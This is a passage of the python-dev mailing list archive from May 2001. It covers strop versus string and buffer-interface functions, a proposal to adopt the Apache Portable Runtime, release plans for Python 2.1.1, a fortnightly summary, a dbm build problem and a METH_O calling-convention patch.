In-Reply-To: ; from gvanrossum@users.sourceforge.net on Mon, May 14, 2001 at 07:14:46PM -0700 References: Message-ID: <20010524013349.Y5402@lyra.org> On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote: > Update of /cvsroot/python/python/dist/src/Modules > In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules > > Modified Files: > stropmodule.c > Log Message: > Add warnings to the strop module, for to those functions that really > *are* obsolete; three variables and the maketrans() function are not > (yet) obsolete. > > Add a compensating warnings.filterwarnings() call to test_strop.py. > > Add this to the NEWS. Something that I ran into the other day... >>> ob = some_object_implementing_the_buffer_interface >>> string.find(ob, '.') (fails because ob does not define the .find method) >>> strop.find(ob, '.') (succeeds) The point is that strop uses the t# to get a ptr/len pair to do its work. Thus, it can work on many things that export the buffer interface. Dropping strop means we no longer have many of those functions. Instead, the functionality must be copied to *every* object that implements the buffer interface. We can say ob.find() now, but we can't say find(ob) any longer. And saying that all objects (which implement the buffer API) must now implement a bunch of "standard" methods is awfully burdensome. In my particular case, I was trying to do a find on a BufferObject referring to a subset of another object. Blam. No good. Thankfully, when I did a find() on a mmap object, it worked simply because mmaps happen to define a .find method. [ of course, the find method on an mmap was totally broken, but I checked in a fix for that (last week or so) ] So... my question is: is there any way that we can retain a generic find() (and similar functions from the string/strop module) that operates on any type that implements the buffer API? Maybe there is some way we can do a mixin for Python types? e.g. "this mixin implements some standard methods for 8-bit character data (using the buffer API), which can be mixed into new Python types" That would reduce the burden for new types. Thoughts? Cheers, -g -- Greg Stein, http://www.lyra.org/ From gstein at lyra.org Thu May 24 10:52:58 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 01:52:58 -0700 Subject: [Python-Dev] IPv6 In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>; from guido@digicool.com on Thu, May 17, 2001 at 02:18:27PM -0400 References: <200105171818.f4HIIRv12891@odiug.digicool.com> Message-ID: <20010524015258.Z5402@lyra.org> On Thu, May 17, 2001 at 02:18:27PM -0400, Guido van Rossum wrote: > What's out IPv6 story? I recall that someone once sent me patches, > but they didn't work for me. Is it time to try again? In certain > circles IPv6 support in Python would be enough to switch programming > languages... :-) Radical suggestion: Toss out a ton of the platform-specific stuff in Python and use the Apache Portable Runtime (APR). It has IPv6 in it, but it could also help with loading shared libraries, threading, mmap'd files, sockets, etc. (it won't replace *all* of Python's platform specific stuff; I think Python has more coverage than APR does) Could simplify a number of things for Python, and reduce some of the maintenance costs... Cheers, -g -- Greg Stein, http://www.lyra.org/ From thomas at xs4all.net Thu May 24 11:01:52 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Thu, 24 May 2001 11:01:52 +0200 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: ; from mwh@python.net on Thu, May 24, 2001 at 08:37:17AM +0100 References: <20010523160025.B690@xs4all.nl> Message-ID: <20010524110152.Q676@xs4all.nl> [ Answer CC'd to python-dev since it deserves an official answer :) ] On Thu, May 24, 2001 at 08:37:17AM +0100, Michael Hudson wrote: > For summarasing purposes, do you have any idea when Python 2.1.1 will > be released? > "No" is a perfectly acceptable answer. Then "No" it is ! Even though I have a fair bit of patches in the queue right now, I need some more time to check out (no pun intended) the changes since the fork, and I want to browse the bug list for possible bugs that should be checked out and fixed for 2.1.1. Another couple of weeks at least, before a release candidate. It also depends on Moshe; if he actually releases 2.0.1 anytime soon, I'll hold off on 2.1.1 a bit longer. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal at lemburg.com Thu May 24 12:18:50 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 24 May 2001 12:18:50 +0200 Subject: [Python-Dev] strop vs. string References: <20010524013349.Y5402@lyra.org> Message-ID: <3B0CE00A.488C8D73@lemburg.com> Greg Stein wrote: > > On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote: > > Update of /cvsroot/python/python/dist/src/Modules > > In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules > > > > Modified Files: > > stropmodule.c > > Log Message: > > Add warnings to the strop module, for to those functions that really > > *are* obsolete; three variables and the maketrans() function are not > > (yet) obsolete. > > > > Add a compensating warnings.filterwarnings() call to test_strop.py. > > > > Add this to the NEWS. > > Something that I ran into the other day... > > >>> ob = some_object_implementing_the_buffer_interface > >>> string.find(ob, '.') > (fails because ob does not define the .find method) > >>> strop.find(ob, '.') > (succeeds) > > The point is that strop uses the t# to get a ptr/len pair to do its work. > Thus, it can work on many things that export the buffer interface. Dropping > strop means we no longer have many of those functions. Instead, the > functionality must be copied to *every* object that implements the buffer > interface. > > We can say ob.find() now, but we can't say find(ob) any longer. And saying > that all objects (which implement the buffer API) must now implement a bunch > of "standard" methods is awfully burdensome. > > In my particular case, I was trying to do a find on a BufferObject referring > to a subset of another object. Blam. No good. Thankfully, when I did a > find() on a mmap object, it worked simply because mmaps happen to define a > .find method. > > [ of course, the find method on an mmap was totally broken, but I checked in > a fix for that (last week or so) ] > > So... my question is: is there any way that we can retain a generic find() > (and similar functions from the string/strop module) that operates on any > type that implements the buffer API? > > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin > implements some standard methods for 8-bit character data (using the buffer > API), which can be mixed into new Python types" That would reduce the burden > for new types. I suppose that in 2.2 we'll be able to build a class/type hierarchy which then provides these possibilities. I haven't followed Guido's latest checkins closely though -- could be that types don't support multiple inheritence. BTW, wouldn't it suffice to add these methods to buffer objects ? Then you could write: buffer(ob).find('.'). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From barry at digicool.com Thu May 24 13:50:34 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Thu, 24 May 2001 07:50:34 -0400 Subject: [Python-Dev] IPv6 References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> Message-ID: <15116.62858.720241.46017@anthem.wooz.org> >>>>> "GS" == Greg Stein writes: GS> Toss out a ton of the platform-specific stuff in Python and GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but GS> it could also help with loading shared libraries, threading, GS> mmap'd files, sockets, etc. I don't know squat about APR, but would it have to be either-or? IOW, would it be possible to wrap the APR in a module (or package) and provide it as an importable alternative? -Barry From mal at lemburg.com Thu May 24 14:22:42 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 24 May 2001 14:22:42 +0200 Subject: [Python-Dev] IPv6 References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org> Message-ID: <3B0CFD12.164271D8@lemburg.com> "Barry A. Warsaw" wrote: > > >>>>> "GS" == Greg Stein writes: > > GS> Toss out a ton of the platform-specific stuff in Python and > GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but > GS> it could also help with loading shared libraries, threading, > GS> mmap'd files, sockets, etc. > > I don't know squat about APR, but would it have to be either-or? IOW, > would it be possible to wrap the APR in a module (or package) and > provide it as an importable alternative? Should be possible; the problem is: how do you get the APR types to interact with the original Python ones (e.g. file types). Many low-level Python functions require the native Python types, so while wrapping APR as Python module would provide an alternative, that alternative will most probably not help much w/r to simplifying portability issues. FYI, here's what the APR has to offer (taken from the APRDesign file that comes with Apache 2.0 beta): """ The base types in APR file_io File I/O, including pipes lib A portable library originally used in Apache. This contains memory management, tables, and arrays. locks Mutex and reader/writer locks misc Any APR type which doesn't have any other place to belong network_io Network I/O shmem Shared Memory (Not currently implemented) signal Asynchronous Signals threadproc Threads and Processes time Time """ It currently supports: Unix (includes BeOS), Win32 and OS/2. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From gstein at lyra.org Thu May 24 14:55:55 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 05:55:55 -0700 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: <3B0CFD12.164271D8@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 02:22:42PM +0200 References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org> <3B0CFD12.164271D8@lemburg.com> Message-ID: <20010524055555.B5402@lyra.org> On Thu, May 24, 2001 at 02:22:42PM +0200, M.-A. Lemburg wrote: > "Barry A. Warsaw" wrote: > > >>>>> "GS" == Greg Stein writes: > > > > GS> Toss out a ton of the platform-specific stuff in Python and > > GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but > > GS> it could also help with loading shared libraries, threading, > > GS> mmap'd files, sockets, etc. > > > > I don't know squat about APR, but would it have to be either-or? IOW, > > would it be possible to wrap the APR in a module (or package) and > > provide it as an importable alternative? Sure, that is a possibility, but it doesn't save Python much in terms of maintenance or portability. "Just another library" Truly using it could certainly be done as a slow migration, and it is definitely possible to only use portions, subsets, etc. Another alternative would be to use APR as a "platform target". But that just adds yet another platform to support rather than simplifying. > Should be possible; the problem is: how do you get the APR types > to interact with the original Python ones (e.g. file types). Many The header is a total misnomer, but "apr_portable.h" provides access to an opaque type's underlying native object (many of us aren't sure how Ryan arrived at "portable" being the name for the least-portable aspect of the library :-). Anyways... you can extract a file descriptor from a file or socket or pipe. Or a thread ID from an thread object. etc. > low-level Python functions require the native Python types, so > while wrapping APR as Python module would provide an alternative, that > alternative will most probably not help much w/r to simplifying > portability issues. Right. I'd say use the APR functions unless absolute speed is required (such as the readlines stuff). But you could also argue that the hard-core platform specific optimizations could go into APR itself, so that Python doesn't have to worry about them. > FYI, here's what the APR has to offer (taken from the APRDesign > file that comes with Apache 2.0 beta): > """ > The base types in APR > file_io File I/O, including pipes > lib A portable library originally used in Apache. This contains > memory management, tables, and arrays. > locks Mutex and reader/writer locks > misc Any APR type which doesn't have any other place to belong > network_io Network I/O > shmem Shared Memory (Not currently implemented) > signal Asynchronous Signals > threadproc Threads and Processes > time Time > """ That doc is out of date; the list is missing: shared library handling, i18n, mmap, user information access (e.g. getpwnam), uuid handling, getopt replacements, cryptographic random data, and a few other bits here and there. The shared mem actually is implemented mostly, via the libmm library. And note that some of those topics have some nice depth. As I mentioned, network_io supports IPv6, but also portable name lookups, sendfile(), etc. The file_io stuff support optimized stat() and opendir-type calls for the platform. > It currently supports: Unix (includes BeOS), Win32 and OS/2. A lot more than that :-) Pretty much all the Unix variants, including OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. Cheers, -g -- Greg Stein, http://www.lyra.org/ From gstein at lyra.org Thu May 24 15:00:16 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 06:00:16 -0700 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0CE00A.488C8D73@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 12:18:50PM +0200 References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> Message-ID: <20010524060016.D5402@lyra.org> On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote: > Greg Stein wrote: >... > > So... my question is: is there any way that we can retain a generic find() > > (and similar functions from the string/strop module) that operates on any > > type that implements the buffer API? > > > > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin > > implements some standard methods for 8-bit character data (using the buffer > > API), which can be mixed into new Python types" That would reduce the burden > > for new types. > > I suppose that in 2.2 we'll be able to build a class/type > hierarchy which then provides these possibilities. I haven't > followed Guido's latest checkins closely though -- could be that > types don't support multiple inheritence. No idea either... that's why I asked. > BTW, wouldn't it suffice to add these methods to buffer objects ? > Then you could write: buffer(ob).find('.'). You're totally missing the point with that suggestion. It does *not* suffice to add them to buffer objects. What about array objects? mmap objects? Random Joe Object who implements the buffer interface? All of those are out of luck. With strop, I can pass any of those objects to strop.find(). That function has a polymorphic argument. In the current arrangement, every object must implement their own .find and .upper and .whatever. Cheers, -g -- Greg Stein, http://www.lyra.org/ From mwh at python.net Thu May 24 15:02:34 2001 From: mwh at python.net (Michael Hudson) Date: Thu, 24 May 2001 14:02:34 +0100 (BST) Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: <20010524055555.B5402@lyra.org> Message-ID: I can't think of a good way of expressing this, but I don't think we should try to make writing non cross-platform code in Python impossible. Yes, it should be easy to write x-platform code, but if there's some very specific platform trick I can do with, say, setsockopt, I don't want Python to hide it from me just 'cause it doesn't work on VMS. Maybe this isn't an issue here. On Thu, 24 May 2001, Greg Stein wrote: [...] > That doc is out of date; the list is missing: shared library handling, i18n, > mmap, user information access (e.g. getpwnam), uuid handling, getopt > replacements, cryptographic random data, and a few other bits here and > there. The shared mem actually is implemented mostly, via the libmm library. How big is APR? How stable? (in terms of interface; I'm assuming it doesn't crap out through bad programming or it'd be a non-starter) > And note that some of those topics have some nice depth. As I mentioned, > network_io supports IPv6, but also portable name lookups, sendfile(), etc. > The file_io stuff support optimized stat() and opendir-type calls for the > platform. > > > It currently supports: Unix (includes BeOS), Win32 and OS/2. > > A lot more than that :-) Pretty much all the Unix variants, including > OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. That's still less than Python isn't it? RiscOS, Amiga, PalmOS, VMS, Playstation 2(!), from looking at http://www.python.org/download/download_other.html. Cheers, M. From gstein at lyra.org Thu May 24 15:59:21 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 06:59:21 -0700 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: ; from mwh@python.net on Thu, May 24, 2001 at 02:02:34PM +0100 References: <20010524055555.B5402@lyra.org> Message-ID: <20010524065921.E5402@lyra.org> On Thu, May 24, 2001 at 02:02:34PM +0100, Michael Hudson wrote: > I can't think of a good way of expressing this, but I don't think we > should try to make writing non cross-platform code in Python impossible. I don't think this would preclude writing non cross-platform code. As I mentioned, there isn't anything that would prevent the stuff from working side by side. The idea is to simplify certain aspects of Python's platform specific stuff. For example: all those variants of dynamically loading shared modules (Python/dynload_*.c) can be tossed along with the config magic. > Yes, it should be easy to write x-platform code, but if there's some very > specific platform trick I can do with, say, setsockopt, I don't want > Python to hide it from me just 'cause it doesn't work on VMS. APR isn't a least common denominator approach. >... > > That doc is out of date; the list is missing: shared library handling, i18n, > > mmap, user information access (e.g. getpwnam), uuid handling, getopt > > replacements, cryptographic random data, and a few other bits here and > > there. The shared mem actually is implemented mostly, via the libmm library. > > How big is APR? That's relative :-) On my Linux box, a stripped library is 85k. It is also (theoretically) possible to skip building portions of APR. The APIs and symbols are set up for that, but the autoconf setup isn't yet. If you're embedding a private APR build, then you can fine tune what is needed. However, if you're building a public/shared one, then you wouldn't really want to trim it back like that. > How stable? The existing functionality is quite stable. We just keep adding more, though :-) > (in terms of interface; I'm assuming it > doesn't crap out through bad programming or it'd be a non-starter) hehe... you can call it a non-starter, then. APR assumes you pass it valid pointers and objects. For example, if you call apr_file_read(NULL, NULL, 100), then you'll get a segfault rather than EINVAL. Personally, I find that behavior quite fine (EINVAL will invariably get ignored; a segfault doesn't; and this is a programmer error that needs to be attended to -- throw it in his face) Whether others think that is a non-starter... hard to know :-) [ actually, one of the hardest things to integrate would be APR's memory management approach with Python's ] > > And note that some of those topics have some nice depth. As I mentioned, > > network_io supports IPv6, but also portable name lookups, sendfile(), etc. > > The file_io stuff support optimized stat() and opendir-type calls for the > > platform. > > > > > It currently supports: Unix (includes BeOS), Win32 and OS/2. > > > > A lot more than that :-) Pretty much all the Unix variants, including > > OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. > > That's still less than Python isn't it? RiscOS, Amiga, PalmOS, VMS, > Playstation 2(!), from looking at > http://www.python.org/download/download_other.html. Sure it's smaller. It's a blue sky radical suggestion. No more, no less. :-) I mentioned it because the IPv6 stuff came up. I already know a codebase that has handled all the portability issues. That is a bonus :-) However, for the platforms that APR *does* handle today, that would still be a big code reduction for Python. And in the future? Why not extend APR to those other platforms and reduce the Python code even more. I think shifting Python to a portability library is actually quite an interesting thought experiment. Enough to mention it and get people thinking. I think it could be quite handy for the longer term maintainability. Cheers, -g -- Greg Stein, http://www.lyra.org/ From mal at lemburg.com Thu May 24 16:54:24 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 24 May 2001 16:54:24 +0200 Subject: [Python-Dev] strop vs. string References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> Message-ID: <3B0D20A0.3C881F89@lemburg.com> Greg Stein wrote: > > On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote: > > Greg Stein wrote: > >... > > > So... my question is: is there any way that we can retain a generic find() > > > (and similar functions from the string/strop module) that operates on any > > > type that implements the buffer API? > > > > > > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin > > > implements some standard methods for 8-bit character data (using the buffer > > > API), which can be mixed into new Python types" That would reduce the burden > > > for new types. > > > > I suppose that in 2.2 we'll be able to build a class/type > > hierarchy which then provides these possibilities. I haven't > > followed Guido's latest checkins closely though -- could be that > > types don't support multiple inheritence. > > No idea either... that's why I asked. > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > Then you could write: buffer(ob).find('.'). > > You're totally missing the point with that suggestion. It does *not* suffice > to add them to buffer objects. What about array objects? mmap objects? > Random Joe Object who implements the buffer interface? That's the point: you can wrap all those into a buffer object and then use the buffer object methods to manipulate them. In that sense, buffer objects provide an adaptor to the underlying object which implements the needed methods. > All of those are out of luck. > > With strop, I can pass any of those objects to strop.find(). That function > has a polymorphic argument. > > In the current arrangement, every object must implement their own .find and > .upper and .whatever. > > Cheers, > -g > > -- > Greg Stein, http://www.lyra.org/ -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From skip at pobox.com Thu May 24 17:55:23 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 24 May 2001 10:55:23 -0500 Subject: [Python-Dev] strop vs. string In-Reply-To: <20010524060016.D5402@lyra.org> References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> Message-ID: <15117.12011.323759.496982@beluga.mojam.com> Greg> With strop, I can pass any of those objects to strop.find(). That Greg> function has a polymorphic argument. Where doesn't strop compile/run? If it works everywhere, either just rename it to be the string module (copying any bits from the existing string module that it doesn't yet have) or rename it something like buffer_funcs. Skip From skip at pobox.com Thu May 24 17:58:24 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 24 May 2001 10:58:24 -0500 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: References: <20010524055555.B5402@lyra.org> Message-ID: <15117.12192.114564.111578@beluga.mojam.com> >> > It currently supports: Unix (includes BeOS), Win32 and OS/2. >> >> A lot more than that :-) Pretty much all the Unix variants, including >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. Michael> That's still less than Python isn't it? RiscOS, Amiga, PalmOS, Michael> VMS, Playstation 2(!), Not to mention MacOS < X... ;-) Skip From mwh at python.net Thu May 24 18:38:37 2001 From: mwh at python.net (Michael Hudson) Date: Thu, 24 May 2001 17:38:37 +0100 (BST) Subject: [Python-Dev] python-dev summary 2001-05-10 - 2001-05-24 Message-ID: This is a summary of traffic on the python-dev mailing list between May 10 and May 24 (inclusive) 2001. It is intended to inform the wider Python community of ongoing developments. To comment, just post to python-list at python.org or comp.lang.python in the usual way. Give your posting a meaningful subject line, and if it's about a PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep iteration) All python-dev members are interested in seeing ideas discussed by the community, so don't hesitate to take a stance on a PEP if you have an opinion. This is the eighth summary written by Michael Hudson. Summaries are archived at: Posting distribution (with apologies to mbm) Number of articles in summary: 322 | [|] | [|] 30 | [|] | [|] [|] [|] [|] | [|] [|] [|] [|] | [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] 20 | [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] 10 | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] 0 +-023-025-017-018-028-031-036-032-025-002-015-018-020-032 Thu 10| Sat 12| Mon 14| Wed 16| Fri 18| Sun 20| Tue 22| Fri 11 Sun 13 Tue 15 Thu 17 Sat 19 Mon 21 Wed 23 Pretty busy fortnight. The above distribution may be somewhat skewed because I changed my subscription address to python-dev and was unsubscribed for a while. Although any impact this had is probably countered by ESR and Barry's discussion of "Puffy the Frog"... * Type/class * Paul Prescod has been keeping an eye on Guido's descr-branch work, and posted concerns about when objects will have a __dict__: Then there was more technical discussion about subclassing builtin types and Steven Majewski evangelising prototype-based OO languages (though I'm not sure why!). * Easy codec access * Marc-Andre Lemburg checked in his decode string method patch, and some new codecs so you can now do things like: >>> "abc".encode('zlib').encode('base64') 'eJxLTEoGAAJNASc=\n' >>> _.decode('base64').decode('zlib') 'abc' There was a small discussion on what other codecs might be handy and Guido added quoted-printable to check it was easy. * Performance * The big discussion(s) on python-dev over the past fourteen days has centred on performance, especially on that of comparisons and the related area of dict performance. It all started with Tim Peters running a simple test program on 2.0, 2.1 and current CVS: The discussion had an unusual flavour for one about performance: a concentration on measuring performance numbers and making sure that the optimizations being discussed actually improved these numbers. This is hard; everyone wants to speed the "typical Python app" but of course there is no such thing; people have been using, amongst others, pystone, pybench and the test suite, none of which are particularly good candidates... Tim posted the distribution of sizes of dicts in a run of the test suite: which showed that small dicts are overwhelmingly the commonest. Marc piped up with an old optimization idea of his: He posted a patch to sourceforge, Tim rewrote it and checked it in, so dicts should be a little faster in 2.2. But as I said, the discussion was kicked off by the performance of comparisons, especially strings. Martin von Loewis posted some statistics from an instrumented interpreter: The issue is that the rich comparisons of Python 2.1 have added a layer of complexity to the comparisons code. Although the rich comparisons (might) provide an opportunity for faster code in some circumstances, code that still uses old-style comparisons can and does take a hit. Strings still use the old-style comparisons and are compared a *lot* (especially in dicts), so it seems "upgrading" them to rich comparisons should be a win and Marc posted a patch to sf that does this. Marc also managed to promise to make a concerted effort to find speed optimizations in the next few months: Finally, in a coda Jeremy noticed that Python spends an alarming amount of time decoding those "Oi|s#" strings that get passed to PyArg_ParseTuple: and Tim pointed out that optimizing "O" might be a win: * FP vs. tutorial * Tim pointed out that the tutorial currently contains examples of floating point output that is platform dependent, and that this is bad. He proposed changing the tutorial to only use fractions that can be exactly represented as floats, and adding a discussion (possibly in an appendix) of the reasons why >>> 0.1 0.10000000000000001 is not broken. There was a discussion of how detailed the discussion should be where the point was made that it's not really important to explain precisely *why* this happens, but it suffices to convince the newbie that floating point is more complicated than he or she thinks. Lets hope that suitable text is composed soon, and that people actually read it ... there have been two "floating point is broken" bug reports on sourceforge in just the last week. * unifying os.rename semantics across platforms * Skip pointed out that os.rename behaves differently on Posix and Windows platforms when the destination file exists: on Posix the destination is silently replaced in an atomic operation, whereas on Windows an exception is raised. Skip proposed enforcing posix semantics everywhere, but this has two problems (a) it's backwards incompatible (b) it's impossible (you can't avoid the race condition on Windows). So maybe we'll just settle for better documentation. * Python 2.1.1 * Thomas Wouters started back-porting bug fixes to the 2,1-maint branch in preparation for a 2.1.1 release. There is as yet no firm - or even vague - plans about release dates. * Daily Python-URL on your Palm * Marc-Andre Lemburg announced that you can now read Pythonware's Daily Python-URL on your Palm Pilot as an AvantGo channel: Cheers, M. From gstein at lyra.org Thu May 24 21:45:18 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 12:45:18 -0700 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0D20A0.3C881F89@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 04:54:24PM +0200 References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> Message-ID: <20010524124518.N5402@lyra.org> On Thu, May 24, 2001 at 04:54:24PM +0200, M.-A. Lemburg wrote: >... > That's the point: you can wrap all those into a buffer object > and then use the buffer object methods to manipulate them. In > that sense, buffer objects provide an adaptor to the underlying > object which implements the needed methods. That would certainly be a valid solution. And at the C level, we could share functions between PyBufferObject and PyStringObject. Cheers, -g -- Greg Stein, http://www.lyra.org/ From gstein at lyra.org Thu May 24 22:07:43 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 13:07:43 -0700 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: <15117.12192.114564.111578@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 10:58:24AM -0500 References: <20010524055555.B5402@lyra.org> <15117.12192.114564.111578@beluga.mojam.com> Message-ID: <20010524130743.O5402@lyra.org> On Thu, May 24, 2001 at 10:58:24AM -0500, skip at pobox.com wrote: > > >> > It currently supports: Unix (includes BeOS), Win32 and OS/2. > >> > >> A lot more than that :-) Pretty much all the Unix variants, including > >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. > > Michael> That's still less than Python isn't it? RiscOS, Amiga, PalmOS, > Michael> VMS, Playstation 2(!), > > Not to mention MacOS < X... ;-) As I mentioned, MacOS X is already there. MacOS Classic is not. But the presence of a portability library such as APR does not exclude the use of direct platform hooks where/when necessary. For a bunch of stuff, you use APR [to reduce complexity/maintenance]. For the rest, you go native just like today. Cheers, -g -- Greg Stein, http://www.lyra.org/ From skip at pobox.com Thu May 24 23:15:48 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 24 May 2001 16:15:48 -0500 Subject: [Python-Dev] Odd message from test_dbm Message-ID: <15117.31236.804746.160037@beluga.mojam.com> I just noticed this message when running make test: test test_dbm skipped -- /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey I'm running a vanilla Mandrake 8.0 system. Unfortunately, I can't check libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip them... Anybody else seen this? Skip From thomas at xs4all.net Thu May 24 23:42:58 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Thu, 24 May 2001 23:42:58 +0200 Subject: [Python-Dev] Odd message from test_dbm In-Reply-To: <15117.31236.804746.160037@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 04:15:48PM -0500 References: <15117.31236.804746.160037@beluga.mojam.com> Message-ID: <20010524234258.I690@xs4all.nl> On Thu, May 24, 2001 at 04:15:48PM -0500, skip at pobox.com wrote: > I just noticed this message when running make test: > test test_dbm skipped -- /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey > I'm running a vanilla Mandrake 8.0 system. Unfortunately, I can't check > libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip > them... The problem is that the dbmmodule isn't linked to the right library. Debian has a similar (if not the same) problem. setup.py doesn't try hard enough to figure out the right library to link with; it checks for libndbm, but not libdbm or libgdbm (it assumes DBM support is in libc if not in libndbm.) I *think* all it needs to do is check for libdbm as well as libndbm, but this might pick up old/incompatible libraries on some platforms, and it might still require fiddling of include paths on others. I seem to recall you had to include either /usr/include/db1/ndbm.h (to use libdbm) or /usr/include/gdbm/ndbm.h or /usr/include/gdbm-ndbm.h (to use gdbm's ndbm 'emulation') but I gave up in frustration trying to figure out the difference :P -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From greg at cosc.canterbury.ac.nz Fri May 25 04:45:01 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Fri, 25 May 2001 14:45:01 +1200 (NZST) Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0CE00A.488C8D73@lemburg.com> Message-ID: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> "M.-A. Lemburg" : > BTW, wouldn't it suffice to add these methods to buffer objects ? > Then you could write: buffer(ob).find('.'). Aren't buffer objects as they're currently implemented inherently dangerous? Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From martin at loewis.home.cs.tu-berlin.de Fri May 25 08:00:47 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 25 May 2001 08:00:47 +0200 Subject: [Python-Dev] Special-casing "O" Message-ID: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> > Special-casing the snot out of "O" looks like a winner : I have a patch on SF that takes this approach: http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470 The idea is that functions can be declared as METH_O, instead of METH_VARARGS. I also offer METH_l, but this is currently not used. The approach could be extended to other signatures, e.g. METH_O_opt_O (i.e. "O|O"). Some signatures cannot be changed into special-calls, e.g. "O!", or "ll|l". In the PyXML test suite, "O" is indeed the most frequent case (72%), and it is primarily triggered through len (26%), append (24%), and ord (6%). These are the only functions that make use of the new calling conventions at the moment. If you look at the patch, you'll see that it is quite easy to change a method to use a different calling convention (basically just remove the PyArg_ParseTuple call). To measure the patch, I use the script from time import clock indices = [1] * 